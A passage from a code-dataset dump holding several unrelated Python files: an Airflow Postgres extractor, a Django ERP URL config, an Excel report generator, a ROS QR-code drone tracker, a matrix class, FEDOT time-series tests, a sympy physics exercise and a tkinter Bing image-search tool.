ordinal_position=row[_ORDINAL_POSITION]\n )\n\n # Attempt to get table schema\n table_key: str = f\"{table_schema_name}.{table_name}\"\n table_schema: Optional[DbTableSchema] = schemas_by_table.get(table_key)\n\n if table_schema:\n # Add column to existing table schema.\n schemas_by_table[table_key].columns.append(table_column)\n else:\n # Create new table schema with column.\n schemas_by_table[table_key] = DbTableSchema(\n schema_name=table_schema_name,\n table_name=table_name,\n columns=[table_column]\n )\n\n return list(schemas_by_table.values())\n","sub_path":"integrations/airflow/marquez_airflow/extractors/postgres_extractor.py","file_name":"postgres_extractor.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586853021","text":"import os\nfrom datetime import datetime, timedelta\nimport click\nfrom copy import deepcopy as dcpy\n\nimport numpy as np\nfrom numpy.random import MT19937\nfrom numpy.random import RandomState, SeedSequence\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd \nimport holidays\n\nimport configuration as config\n\n@click.command()\n@click.option(\n \"-o\",\n \"--outdir\",\n required=True,\n type=click.Path(),\n help='Path to directory where the synthetic datasets should be stored'\n)\ndef main(outdir):\n rng = RandomState(MT19937(SeedSequence(config.seed)))\n\n berlin_holidays = holidays.DE(prov=\"BW\")\n\n num_employees = 20000\n num_jobsites = 200\n num_areas = 20\n num_qualifications = 40\n num_shifts = 3\n num_days = 356\n\n num_orders = 1000\n df = pd.DataFrame.from_dict({\n \"Einsatzort\": rng.randint(0, num_jobsites, num_orders),\n \"Qualifikation\":rng.randint(0, num_qualifications, num_orders),\n \"Schicht\": rng.randint(0, num_shifts, num_orders),\n \"Tag\": rng.randint(0, num_days, num_orders),\n })\n\n df[\"Tag\"] = df[\"Tag\"].apply(lambda day: datetime(2019, 1, 1)+ timedelta(day))\n df[\"Wochentag\"] = df[\"Tag\"].apply(lambda day: day.strftime(\"%a\"))\n df[\"Feiertag\"] = df[\"Tag\"].apply(lambda day: day in berlin_holidays)\n\n # grouping of jobsites into areas\n area_splits = np.cumsum(rng.randint(1,10,num_areas))\n area_splits = (area_splits.T / area_splits.max()*num_jobsites).astype(int)\n df[\"Ort\"] = df[\"Einsatzort\"].apply(lambda jobsite_id: np.argmax(area_splits>jobsite_id))\n\n offers = []\n for _ in range(len(df)):\n offers.append(\n rng.choice(range(num_employees), replace=False, size=rng.randint(1,6)).tolist()\n )\n\n df[\"Mitarbeiter ID\"] = offers\n\n\n train, test = train_test_split(df)\n \n train.to_csv(\n os.path.join(outdir, \"train.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n test.to_csv(\n os.path.join(outdir, \"test_truth.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n test[[\"Einsatzort\", \"Qualifikation\", \"Schicht\", \"Tag\", \"Wochentag\", \"Feiertag\", \"Ort\"]].to_csv(\n os.path.join(outdir, \"test_publish.tsv\"),\n index=False,\n sep=\"\\t\"\n )\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/synthesize.py","file_name":"synthesize.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"343214489","text":"\"\"\"MAB_ERP URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom erp import api_views\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^erp/', include('erp.urls')),\n url(r'^login/$', api_views.login_api),\n url(r'^logout/$', api_views.logout_api),\n url(r'^settings/$', api_views.change_settings_api),\n url(r'^employee/$', api_views.employee__list_api),\n url(r'^employee/([0-9]+)/$', api_views.employee_api),\n url(r'^product/$', api_views.product__list_api),\n url(r'^product/([0-9]+)/$', api_views.product_api),\n url(r'^supplier/$', api_views.supplier__list_api),\n url(r'^supplier/([0-9]+)/$', api_views.supplier_api),\n url(r'^supply/$', api_views.supply__list_api),\n url(r'^supply/([0-9]+)/$', api_views.supply_api),\n url(r'^recipient/$', api_views.recipient__list_api),\n url(r'^recipient/([0-9]+)/$', api_views.recipient_api),\n url(r'^shipment/$', api_views.shipment__list_api),\n url(r'^shipment/([0-9]+)/$', api_views.shipment_api),\n url(r'^reports/([0-9]+)/$', api_views.reports_api),\n]\n","sub_path":"mab_erp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620029257","text":"import os\nimport platform\nimport time\n\nimport jinja2\nimport pandas as pd\nfrom docxtpl import DocxTemplate\nfrom pandas import DataFrame\nfrom baoming.settings import MEDIA_URL, MEDIA_ROOT, BASE_DIR\nfrom webapp.controller.common import *\nfrom webapp.models import *\nimport xlrd\nimport xlutils.copy\nimport platform\nfrom webapp.utils.date_encoder import *\n\n\ndef reporter_chemical_not_list(student_infos=None):\n \"\"\"\n 非化学类的\n :return:\n \"\"\"\n try:\n document_root = os.path.join(BASE_DIR, 'document')\n filepath = document_root + \"/fujian04_excel_format.xlsx\"\n\n # system_type = platform.system()\n # if 'indows' in system_type:\n # filepath = \"D:/PycharmProjects/lelingzdy/baoming/webapp/utils/fujian04_excel_format.xlsx\"\n # else:\n # filepath = \"/opt/python3_space/lelingzdy/baoming/webapp/utils/fujian04_excel_format.xlsx\"\n original_data = pd.read_excel(filepath, encoding='utf-8')\n # rb打开该excel,formatting_info=True表示打开excel时并保存原有的格式\n rb = xlrd.open_workbook(filepath, formatting_info=True)\n # 创建一个可写入的副本\n wb = xlutils.copy.copy(rb)\n if not student_infos:\n student_infos = StudentInfo.objects.filter(confirm_status=1, chemical_worker=2)\n tmp_array = []\n if len(student_infos) > 0:\n tmp_num = 0\n for student in student_infos:\n identification_level = str(student.identification_level)\n if len(identification_level) > 0:\n identification_level = worker_level[str(student.identification_level)]\n else:\n identification_level = ''\n # 原证书编号\n original_certificate_number = student.original_certificate_number\n if original_certificate_number:\n pass\n else:\n original_certificate_number = \"\"\n\n # 文化程度\n education_degree = student.user_info.education_degree\n if education_degree:\n education_name = student.user_info.education_degree.education_name\n else:\n education_name = ''\n tmp_num = tmp_num + 1\n # tmp_dict = {'index': str(tmp_num),\n # 'r_e': 
student.user_info.real_name,\n # 'id_number': student.user_info.id_number,\n # 'sa': get_sex(student.user_info.sex),\n # 'school': student.user_info.middle_school,\n # 'f_occ': student.declaration_of_occupation,\n # 's_w_d': student.user_info.start_working_date,\n # 'id_level': identification_level,\n # 'jsll': '',\n # 'sjcz': '',\n # 'o_cer_num': original_certificate_number,\n # 'issuance_time': issuance_time}\n # tmp_list.append(tmp_dict)\n # 原级别\n primary_level = str(student.primary_level)\n if len(student.primary_level) > 0:\n primary_level = worker_level[str(student.primary_level)]\n else:\n primary_level = ''\n if student.user_info.start_working_date:\n start_working_date = date_encoder(student.user_info.start_working_date)\n else:\n start_working_date = ''\n\n if student.issuance_time:\n issuance_time = date_encoder(student.issuance_time)\n else:\n issuance_time = ''\n\n tmp_array.append([tmp_num,\n student.user_info.real_name,\n student.user_info.id_number,\n get_sex(student.user_info.sex),\n '',\n education_name,\n student.declaration_of_occupation,\n start_working_date,\n identification_level,\n '',\n '',\n '',\n original_certificate_number,\n issuance_time])\n num = 0\n print('len:::' + str(len(original_data)))\n for row in range(0, len(original_data)):\n if row > 3:\n out_sheet = wb.get_sheet(0)\n if num < len(tmp_array):\n set_out_cell(out_sheet, 0, row, tmp_array[num][0])\n set_out_cell(out_sheet, 1, row, tmp_array[num][1])\n set_out_cell(out_sheet, 2, row, tmp_array[num][2])\n set_out_cell(out_sheet, 3, row, tmp_array[num][3])\n set_out_cell(out_sheet, 4, row, tmp_array[num][4])\n set_out_cell(out_sheet, 5, row, tmp_array[num][5])\n set_out_cell(out_sheet, 6, row, tmp_array[num][6])\n set_out_cell(out_sheet, 7, row, tmp_array[num][7])\n set_out_cell(out_sheet, 8, row, tmp_array[num][8])\n set_out_cell(out_sheet, 9, row, tmp_array[num][9])\n set_out_cell(out_sheet, 10, row, tmp_array[num][10])\n set_out_cell(out_sheet, 11, row, tmp_array[num][11])\n set_out_cell(out_sheet, 12, row, tmp_array[num][12])\n set_out_cell(out_sheet, 13, row, tmp_array[num][13])\n else:\n set_out_cell(out_sheet, 0, row, num + 1)\n num = num + 1\n\n day_string = str(time.strftime('%Y/%m/%d', time.localtime(time.time())))\n file_root = MEDIA_ROOT + \"/files/\"\n day_files_path = file_root + 'reporter_chemical_not_list' + \"/files/\" + day_string\n if os.path.exists(day_files_path):\n pass\n else:\n os.makedirs(day_files_path)\n uuid_string = str(uuid.uuid4())\n file_day_files_path = day_files_path + \"/\" + uuid_string + \".xlsx\"\n wb.save(file_day_files_path)\n if os.path.exists(file_day_files_path):\n file_manage = FileManage()\n file_manage.file_name = \"非化工类学员报名表-\" + day_string\n file_manage.file_uuid = uuid_string\n file_manage.file_path = file_day_files_path\n file_manage.save()\n # 附件1 生成非化工类学员化名册成功,\n return str(file_manage.file_uuid)\n else:\n return None\n else:\n return None\n except Exception as e:\n print(e)\n raise e\n\n\ndef get_sex(value):\n \"\"\"\n 性别过滤器\n :param value:\n :return:\n \"\"\"\n return_value = ''\n if value == 'MALE':\n return_value = '男'\n if value == 'FEMALE':\n return_value = '女'\n if value == 'OTHER':\n return_value = '未填写'\n return return_value\n\n\ndef set_out_cell(out_sheet, col, row, value):\n \"\"\" Change cell value without changing formatting. \"\"\"\n\n def _getOutCell(out_sheet, colIndex, rowIndex):\n \"\"\" HACK: Extract the internal xlwt cell representation. 
\"\"\"\n row = out_sheet._Worksheet__rows.get(rowIndex)\n if not row: return None\n\n cell = row._Row__cells.get(colIndex)\n return cell\n\n # HACK to retain cell style.\n previousCell = _getOutCell(out_sheet, col, row)\n # END HACK, PART I\n\n out_sheet.write(row, col, value)\n\n # HACK, PART II\n if previousCell:\n newCell = _getOutCell(out_sheet, col, row)\n if newCell:\n newCell.xf_idx = previousCell.xf_idx\n","sub_path":"baoming/webapp/utils/reporter_chemical_not_list_format.py","file_name":"reporter_chemical_not_list_format.py","file_ext":"py","file_size_in_byte":8060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"558822117","text":"#!/usr/bin/env python\nimport sys\nimport rospy\nimport operator\nimport cv2\nimport zbar\nfrom PIL import Image\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom array import array\n\ndef callback_image(data):\n image = None\n bridge = CvBridge()\n try:\n image = bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n output = image.copy()\n\n height, width, channels = output.shape\n #print height, width, channels\n \n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Uses PIL to convert the grayscale image into a ndary array that ZBar can understand.\n #image = Image.fromarray(gray)\n image = np.array (gray)\n #width, height = image.size\n width = 640\n height = 360\n\n #Transformamos el frame para despues escanear lo que detecta\n zbar_image = zbar.Image(width, height, 'Y800', image.tostring())\n\n # Scans the zbar image.\n scanner = zbar.ImageScanner()\n scanner.scan(zbar_image)\n # Prints data from image.\n for decoded in zbar_image:\n #print(\"Data: \",decoded.data)\n #print(\"Tipo: \",decoded.type)\n #print(\"Pos: \",decoded.location)\n\n # Dibujando Puntos\n puntos = decoded.location\n centro = puntos[0] \n d1 = (puntos[2][0] + puntos[3][0]) / 2\n d2 = (puntos[1][1] + puntos[2][1]) / 2\n\n # Centro QR Code (d1,d2)\n cv2.circle(output,(d1,d2), 5, (0,0,255), -1)\n\n # Centro Video Frame (c1,c2)\n c1 = 320\n c2 = 180\n cv2.circle(output,(c1,c2), 20, (0,90,255), -1)\n cv2.line(output,(c1,c2),(d1,d2),(0,0,255),5)\n\n print(\"Centro Frame :\",c1, \" \",c2)\n print(\"Centro QR code :\",d1, \" \",d2)\n # Movimientos\n if c1 < d1:\n print(\"Muevete a la derecha !!!\")\n if c1 > d1:\n print(\"Muevete a la izquierda !!!\")\n if c2 > d2:\n print(\"Muevete hacia arriba !!!\")\n if c2 < d2:\n print(\"Muevete hacia abajo !!!\")\n\n\n \n # Number of points in the convex hull\n n = len(puntos)\n \n # Draw the convext hull\n for j in range(0,n):\n cv2.line(output, puntos[j], puntos[ (j+1) % n], (255,0,0), 3)\n # Alineando al centro\n #if \n\n\n\n\n \n cv2.imshow(\"Image\", output)\n cv2.waitKey(3)\n\n\nif __name__ == '__main__':\n rospy.init_node('Track')\n rospy.Subscriber(\"/ardrone/front/image_raw\", Image, callback_image)\n rospy.spin()\n \ncv2.destroyAllWindows()","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314780631","text":"import json\nimport pdb\n\n\nclass Matrix:\n def __init__(self):\n self.rows = []\n self.N = 0\n self.M = 0\n # self.rows = [[80, 10, 0], [1, 2, 3]]\n\n def __mul__(self, mtx):\n if type(mtx) != type(self):\n raise TypeError(\"Matrix class not used to multiply\")\n\n if self.M != mtx.N:\n raise ArithmeticError(\n 
\"Dimensions of the matricies do not match and are unable to be multiplied.\"\n )\n\n # Create the matrix.\n C = Matrix()\n C.rows = []\n for _ in range(self.M):\n C.rows.append([0] * mtx.N)\n\n for i in range(len(self.rows)):\n for j in range(len(self.rows[0])):\n for k in range(len(mtx.rows[0])):\n C.rows[i][k] += self.rows[i][j] * mtx.rows[j][k]\n\n C.update()\n return C\n\n def __imul__(self, mtx):\n self = self * mtx\n return self\n\n def __str__(self):\n return \"N({}) x M({})\\n\".format(self.N, self.M) + \"\\n\".join(\n [\" \".join([\"{:3}\".format(val) for val in row]) for row in self.rows]\n )\n\n def __repr__(self):\n return self.rows\n\n def update(self):\n self.N = len(self.rows)\n self.M = len(self.rows[0])\n return True\n\n def load_file(self, filename):\n with open(filename, \"r\") as ftext:\n data = json.load(ftext)\n\n n_rank = data[\"n\"]\n m_rank = data[\"m\"]\n\n A = []\n col_idx = 0\n n_rows = 0\n\n # Iterate through the rows until the value is found.\n for i in range(0, m_rank - 1):\n next_row = data[\"rows\"][i + 1]\n while col_idx != next_row - 1:\n row = [0] * n_rank\n if n_rows == n_rank:\n break\n\n # Iterate through the columns populating the values.\n for k in range(0, n_rank):\n if k + 1 == data[\"cols\"][col_idx]:\n row[k] = data[\"vals\"][col_idx]\n col_idx += 1\n\n n_rows += 1\n A.append(row)\n self.rows = A\n self.update()\n return A\n\n def transpose(self):\n at = Matrix()\n at.rows = []\n\n for i in range(self.N):\n current_row = []\n for k in range(self.M):\n current_row.append(self.rows[k][i])\n at.rows.append(current_row)\n\n at.update()\n return at\n\n def transpose_file(self, filename, new_file):\n with open(filename, \"r\") as csr:\n data = json.load(csr)\n\n mapping = {}\n row = 0\n row_limit = data[\"rows\"][row]\n done = False\n\n for i in range(len(data[\"cols\"])):\n while i == row_limit and not done:\n if row == len(data[\"rows\"]) - 1:\n done = True\n row += 1\n break\n\n row += 1\n row_limit = data[\"rows\"][row]\n\n col = data[\"cols\"][i]\n if col in mapping:\n mapping[col].append((row, data[\"vals\"][i]))\n else:\n mapping[col] = [(row, data[\"vals\"][i])]\n \n\n\n new_row = []\n new_col = []\n new_val = []\n csr_data = sorted(mapping)\n\n sum = 0\n for key in csr_data:\n new_row.append(sum)\n sum += len(mapping[key])\n\n for val in mapping[key]:\n new_col.append(val[0])\n new_val.append(val[1])\n\n\n\n new_file_contents = {}\n new_file_contents[\"rows\"] = new_row\n new_file_contents[\"cols\"] = new_col\n new_file_contents[\"vals\"] = new_val\n\n with open(\"new_file.json\", \"w\") as nf:\n json.dump(new_file_contents, nf)\n\n \"\"\" \n TRIVIAL SOLUTION\n for i in range(1, len(data[\"rows\"] - 1)):\n row_stop = data[\"rows\"][i]\n\n while col_idx != row_stop: \n At[data[\"cols\"][col_idx]][row] = data[\"vals\"][col_idx]\n col_idx += 1\n \n row += 1\n \n return At\n \"\"\"\n return True\n\n\nm = Matrix()\nm.load_file(\"example_mtx_two.json\")\nprint(m)\n\nm.transpose_file(\"example_mtx_two.json\", \"new_file.json\")\ntranspose = m.transpose()\nprint(transpose)\n\n\n\"\"\"\nprint(m)\nprint()\nc = m * m\nprint(c)\n\"\"\"\n","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"237019441","text":"import os\nimport pandas as pd\n\ndirectory = os.fsencode('./resources/raw')\n\nwriter = pd.ExcelWriter('./resources/output/orderIn60Miles.xlsx')\n\nfor file in os.listdir(directory):\n filename = 
os.fsdecode(file)\n if filename.endswith(\".xlsx\"):\n filename = os.path.join(directory, file).decode()\n city = file.decode().split('.')[0]\n print(city)\n df = pd.read_excel(filename)\n\n dist = df[\"Distance\"]\n distInRadius = list(filter(lambda x: (x <= 60), dist))\n orderInRadius = df[\"Order ID\"][0:len(distInRadius)]\n latInRadius = df[\"Lat\"][0:len(distInRadius)]\n lngInRadius = df[\"Lng\"][0:len(distInRadius)]\n\n data = {'Order ID': orderInRadius, 'Distance': distInRadius, 'Lat': latInRadius, 'Lng': lngInRadius}\n df2 = pd.DataFrame(data)\n\n df2.to_excel(writer, sheet_name=city)\n\nwriter.save()\n","sub_path":"data-tailor.py","file_name":"data-tailor.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209483179","text":"import numpy as np\n\nfrom fedot.core.data.data import InputData\nfrom fedot.core.data.multi_modal import MultiModalData\nfrom fedot.core.operations.evaluation.operation_implementations.data_operations.ts_transformations import \\\n _prepare_target, _ts_to_table, _sparse_matrix\nfrom fedot.core.pipelines.node import PrimaryNode, SecondaryNode\nfrom fedot.core.pipelines.pipeline import Pipeline\nfrom fedot.core.repository.dataset_types import DataTypesEnum\nfrom fedot.core.repository.tasks import Task, TaskTypesEnum, TsForecastingParams\nfrom fedot.core.log import default_log\n\nwindow_size = 4\nforecast_length = 4\nlog = default_log(__name__)\n\n\ndef synthetic_univariate_ts():\n \"\"\" Method returns InputData for classical time series forecasting task \"\"\"\n task = Task(TaskTypesEnum.ts_forecasting,\n TsForecastingParams(forecast_length=forecast_length))\n # Simple time series to process\n ts_train = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130])\n ts_test = np.array([140, 150, 160, 170])\n\n # Prepare train data\n train_input = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_train,\n target=ts_train,\n task=task,\n data_type=DataTypesEnum.ts)\n\n start_forecast = len(ts_train)\n end_forecast = start_forecast + forecast_length\n predict_input = InputData(idx=np.arange(start_forecast, end_forecast),\n features=ts_train,\n target=None,\n task=task,\n data_type=DataTypesEnum.ts)\n return train_input, predict_input, ts_test\n\n\ndef synthetic_with_exogenous_ts():\n \"\"\" Method returns InputData for time series forecasting task with\n exogenous variable \"\"\"\n task = Task(TaskTypesEnum.ts_forecasting,\n TsForecastingParams(forecast_length=forecast_length))\n\n # Time series with exogenous variable\n ts_train = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130])\n ts_exog = np.array([10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23])\n\n ts_test = np.array([140, 150, 160, 170])\n ts_test_exog = np.array([24, 25, 26, 27])\n\n # Indices for forecast\n start_forecast = len(ts_train)\n end_forecast = start_forecast + forecast_length\n\n # Input for source time series\n train_source_ts = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_train, target=ts_train,\n task=task, data_type=DataTypesEnum.ts)\n predict_source_ts = InputData(idx=np.arange(start_forecast, end_forecast),\n features=ts_train, target=None,\n task=task, data_type=DataTypesEnum.ts)\n\n # Input for exogenous variable\n train_exog_ts = InputData(idx=np.arange(0, len(ts_train)),\n features=ts_exog, target=ts_train,\n task=task, data_type=DataTypesEnum.ts)\n predict_exog_ts = InputData(idx=np.arange(start_forecast, end_forecast),\n 
features=ts_test_exog, target=None,\n task=task, data_type=DataTypesEnum.ts)\n return train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test\n\n\ndef test_ts_to_lagged_table():\n # Check first step - lagged transformation of features\n train_input, _, _ = synthetic_univariate_ts()\n\n new_idx, lagged_table = _ts_to_table(idx=train_input.idx,\n time_series=train_input.features,\n window_size=window_size)\n\n correct_lagged_table = ((0., 10., 20., 30.),\n (10., 20., 30., 40.),\n (20., 30., 40., 50.),\n (30., 40., 50., 60.),\n (40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.),\n (70., 80., 90., 100.),\n (80., 90., 100., 110.),\n (90., 100., 110., 120.))\n\n correct_new_idx = (4, 5, 6, 7, 8, 9, 10, 11, 12, 13)\n\n # Convert into tuple for comparison\n new_idx_as_tuple = tuple(new_idx)\n lagged_table_as_tuple = tuple(map(tuple, lagged_table))\n assert lagged_table_as_tuple == correct_lagged_table\n assert new_idx_as_tuple == correct_new_idx\n\n # Second step - processing for correct the target\n final_idx, features_columns, final_target = _prepare_target(idx=new_idx,\n features_columns=lagged_table,\n target=train_input.target,\n forecast_length=forecast_length)\n correct_final_idx = (4, 5, 6, 7, 8, 9, 10)\n correct_features_columns = ((0., 10., 20., 30.),\n (10., 20., 30., 40.),\n (20., 30., 40., 50.),\n (30., 40., 50., 60.),\n (40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.))\n\n correct_final_target = ((40., 50., 60., 70.),\n (50., 60., 70., 80.),\n (60., 70., 80., 90.),\n (70., 80., 90., 100.),\n (80., 90., 100., 110.),\n (90., 100., 110., 120.),\n (100., 110., 120., 130.))\n\n # Convert into tuple for comparison\n final_idx_as_tuple = tuple(final_idx)\n features_columns_as_tuple = tuple(map(tuple, features_columns))\n final_target_as_tuple = tuple(map(tuple, final_target))\n\n assert final_idx_as_tuple == correct_final_idx\n assert features_columns_as_tuple == correct_features_columns\n assert final_target_as_tuple == correct_final_target\n\n\ndef test_sparse_matrix():\n # Create lagged matrix for sparse\n train_input, _, _ = synthetic_univariate_ts()\n _, lagged_table = _ts_to_table(idx=train_input.idx,\n time_series=train_input.features,\n window_size=window_size)\n features_columns = _sparse_matrix(log, lagged_table)\n\n # assert if sparse matrix features less than half or less than another dimension\n assert features_columns.shape[0] == lagged_table.shape[0]\n assert features_columns.shape[1] <= lagged_table.shape[1]/2 or features_columns.shape[1] < lagged_table.shape[0]\n\n\ndef test_forecast_with_sparse_lagged():\n train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test = synthetic_with_exogenous_ts()\n\n node_lagged = PrimaryNode('sparse_lagged')\n # Set window size for lagged transformation\n node_lagged.custom_params = {'window_size': window_size}\n\n node_final = SecondaryNode('linear', nodes_from=[node_lagged])\n pipeline = Pipeline(node_final)\n\n pipeline.fit(input_data=MultiModalData({'sparse_lagged': train_source_ts}))\n\n forecast = pipeline.predict(input_data=MultiModalData({'sparse_lagged': predict_source_ts}))\n is_forecasted = True\n\n assert is_forecasted\n\n\ndef test_forecast_with_exog():\n train_source_ts, predict_source_ts, train_exog_ts, predict_exog_ts, ts_test = synthetic_with_exogenous_ts()\n\n # Source data for lagged node\n node_lagged = PrimaryNode('lagged')\n # Set window size for lagged transformation\n node_lagged.custom_params = {'window_size': window_size}\n # Exogenous 
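# The lagged table asserted above is just a sliding window over the series;
# the fixture rows can be reproduced directly (a sketch):
import numpy as np
series = np.arange(0, 140, 10)  # 0, 10, ..., 130, as in synthetic_univariate_ts()
window = 4
lagged = np.array([series[i:i + window] for i in range(len(series) - window)])
# lagged[0] -> [0 10 20 30], lagged[-1] -> [90 100 110 120]; new indices run 4..13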
variable for exog node\n node_exog = PrimaryNode('exog_ts_data_source')\n\n node_final = SecondaryNode('linear', nodes_from=[node_lagged, node_exog])\n pipeline = Pipeline(node_final)\n\n pipeline.fit(input_data=MultiModalData({'exog_ts_data_source': train_exog_ts,\n 'lagged': train_source_ts}))\n\n forecast = pipeline.predict(input_data=MultiModalData({'exog_ts_data_source': predict_exog_ts,\n 'lagged': predict_source_ts}))\n prediction = np.ravel(np.array(forecast.predict))\n\n assert tuple(prediction) == tuple(ts_test)\n","sub_path":"test/unit/data_operations/test_time_series_operations.py","file_name":"test_time_series_operations.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"624326669","text":"from sympy.physics.units import *\nfrom sympy import *\n\nM = var(\"mass\")\ng = 9.81 *m/s**2\n(d , h) = (1.5 *m , 2.5 *m)\n\nr = d/2\n\npprint(\"\\nv1 / (m/s):\")\nv1 = sqrt(2*g*h)\ntmp = v1\ntmp /= m/s\npprint(N(tmp,3))\n\nJ_S = M*r**2 / 4\nJ_A = J_S + M*r*r\n\nv2 = var(\"v2\")\n\neq = Eq(r*M*v1, J_A*v2/r)\n\nsol = solve(eq,v2)[0]\npprint(\"\\nv2 / (m/s):\")\ntmp = sol\ntmp /= m/s\npprint(N(tmp,3))\n","sub_path":"de/py/10.30.py","file_name":"10.30.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214198771","text":"from tkinter import *\nfrom PIL import Image, ImageTk\n\nimport pyperclip as pc\nimport bingimage as bi\n\nfrom config import *\nfrom random import shuffle\n\nimport procman as pm\nfrom fuzzywuzzy import fuzz\n\nclass ItemListIterator:\n def __init__(self, itemlist):\n self.iterator = iter(itemlist)\n self.current = next(self.iterator)\n\n def getValue(self):\n return self.current\n\n def next(self):\n self.current = next(self.iterator)\n\ndef btn_found_fn(itemiter):\n btn_next_fn(itemiter)\n lbl_text = stringvars['lbl_text']\n lbl_text.set(int(lbl_text.get()) + 1)\n\ndef btn_next_fn(itemiter):\n itemiter.next()\n tbox_text = stringvars['tbox_text']\n tbox_text.set(itemiter.getValue().query())\n pc.copy(tbox_text.get())\n\ndef main_frame(root, itemiter):\n global stringvars\n rframe = Frame(root)\n #rframe.pack(fill=BOTH, expand=True)\n\n stringvars['tbox_text'] = StringVar()\n tbox_text = stringvars['tbox_text']\n tbox_text.set(itemiter.getValue().query())\n tbox = Entry(rframe, textvariable=tbox_text, width=40)\n tbox.grid(row = 0, columnspan=3, sticky=W+E)\n\n btn_cpy = Button(rframe, text='Copy Text', command=lambda: pc.copy(tbox_text.get()))\n btn_cpy.grid(row = 1, column = 0, sticky=W+E)\n\n btn_cpy_inum = Button(rframe, text='Copy Item Number', \\\n command= lambda: pc.copy(str(itemiter.getValue().itemnum)))\n btn_cpy_inum.grid(row = 1, column = 1, sticky=E+W)\n\n stringvars['lbl_text'] = StringVar()\n lbl_text = stringvars['lbl_text']\n lbl_text.set('0')\n lbl_items = Label(rframe, textvariable=lbl_text)\n lbl_items.grid(row=1, column=2, sticky=E+W)\n\n btn_found = Button(rframe, text='Found', \\\n command=lambda: btn_found_fn(itemiter))\n btn_found.grid(row = 2, column = 0, sticky=W+E)\n\n btn_next = Button(rframe, text='Next', \\\n command=lambda: btn_next_fn(itemiter))\n btn_next.grid(row = 2, column = 1, sticky=W+E)\n\n btn_quit = Button(rframe, text='Quit')\n btn_quit.grid(row = 2, column = 2, sticky=E+W)\n\n rframe.grid(row=0,column=0,sticky=N+W)\n \ndef get_next_picture(lbl_image, searchiter):\n search = bi.bingValueResult(next(searchiter))\n img = 
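# The figures printed by the sympy script above can be checked by hand:
from math import sqrt
v1 = sqrt(2 * 9.81 * 2.5)  # free fall through h = 2.5 m  ->  ~7.00 m/s
v2 = 4 * v1 / 5            # J_A = J_S + M*r**2 = (5/4)*M*r**2, so r*M*v1 = J_A*v2/r gives v2 = 4*v1/5
print(round(v1, 2), round(v2, 2))  # 7.0 5.6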
search.downloadImage()\n img = img.resize((300, 300))\n pho_current = ImageTk.PhotoImage(img)\n\n lbl_image.config(image = pho_current)\n lbl_image.photo = pho_current\n lbl_image.update()\n\n set_values(search)\n generate_ratio_values(search)\n\ndef set_values(result):\n global stringvars\n\n stringvars['host'].set(str(result.hostLocation()))\n stringvars['name'].set(str(result.name()))\n stringvars['link'].set(str(result.contentLink()))\n\ndef generate_ratio_values(result):\n global stringvars\n itm = itemiter.getValue()\n name = stringvars['name'].get()\n\n\n stringvars['ratios'].set('({}, {}, {})'.format( \\\n fuzz.UQRatio(itm.description, name), \\\n fuzz.UWRatio(itm.description, name), \\\n fuzz.partial_ratio(itm.description, name)))\n \n \ndef picture_frame(root):\n global stringvars, itemiter\n pframe = Frame(root)\n searchRes = None\n while True:\n searchRes = bi.imageSearch(itemiter.getValue().query())\n if searchRes.valueCount() != 0:\n break\n itemiter.next()\n \n searchiter = iter(searchRes.values())\n search = bi.bingValueResult(next(searchiter))\n img = search.downloadImage()\n img = img.resize((300, 300))\n pho_current = ImageTk.PhotoImage(img)\n \n lbl_image = Label(pframe, image=pho_current)\n lbl_image.photo = pho_current\n lbl_image.grid(row=0, column=0, rowspan=2, columnspan=2,sticky=N+S+E+W)\n\n btn_save = Button(pframe, text='Save')\n btn_save.grid(row=3, column=0, 